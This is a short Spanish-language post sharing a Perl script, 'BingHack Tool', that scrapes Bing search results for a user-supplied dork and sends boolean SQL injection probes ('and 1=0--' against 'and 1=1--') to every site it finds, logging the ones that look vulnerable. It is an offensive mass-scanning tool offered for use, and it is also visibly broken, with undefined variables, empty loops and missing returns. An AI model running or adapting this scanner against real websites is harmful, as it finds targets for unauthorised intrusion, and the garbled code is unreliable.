Un simple script en perl para buscar paginas vulnerables a SQLi usando Bing.
El codigo
#!usr/bin/perl
#BingHack Tool 0.1
#Coded By Doddy H
use LWP::UserAgent;
my $nave = LWP::UserAgent->new;
$nave->agent(
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"
);
$nave->timeout(5);
head();
chomp( my $dork = <stdin> ); chomp( my $pags = <stdin> ); print "\n[+] Searching ...\n"; my @urls = bing( $dork, $pags );
print "\n[+] Pages Found : " . int(@urls) . "\n"; print "\n[+] Scanning ...\n\n";
for my $pa (@urls) {
sql($pa);
}
print "\n[+] Finished\n";
copyright();
sub sql {
my ( $pass1, $pass2 ) = ( "+", "--" );
my $testar1 = toma( $page . $pass1 . "and" . $pass1 . "1=0" . $pass2 );
my $testar2 = toma( $page . $pass1 . "and" . $pass1 . "1=1" . $pass2 );
unless ( $testar1 eq $testar2 ) {
print "[+] SQLI : $page\a\n"; savefile( "sql-logs.txt", $page );
}
}
sub savefile {
open( SAVE
, ">>" . $_[0] ); }
sub bing {
my ( $a, $b ) = @_;
for ( $pages = 10 ; $pages <= $b ; $pages = $pages + 10 ) {
my $code =
toma( "http://www.bing.com/search?q=" . $a . "&first=" . $pages );
while ( $code =~ /<h3><a href="(.*?)"/mig ) {
}
}
my @founds = repes( cortar(@founds) );
}
sub repes {
my @limpio;
foreach $test (@_) {
push @limpio, $test unless $repe{$test}++; }
}
sub cortar {
my @nuevo;
for (@_) {
if ( $_ =~ /=/ ) {
@tengo = split( "=", $_ ); push( @nuevo, @tengo[0] . "=" ); }
else {
}
}
}
sub head {
@@@@ @ @ @ @ @@@@@ @
@ @ @ @ @ @ @
@ @ @ @ @ @ @
@ @ @ @ @@ @@@@ @ @ @@@ @@@ @ @ @ @@@ @@@ @
@@@@ @ @@ @ @ @ @@@@@@ @ @ @ @ @ @ @ @ @ @ @
@ @ @ @ @ @ @ @ @ @@@@ @ @@ @ @ @ @ @ @
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@@@@ @ @ @ @@@@ @ @ @@@@ @@@ @ @ @ @@@ @@@ @
@
@@@@
);
}
sub copyright {
print "\n\n-- == (C) Doddy Hackman 2012\n\n"; <stdin>;
}
sub toma {
return $nave->get( $_[0] )->content; }
# The End ?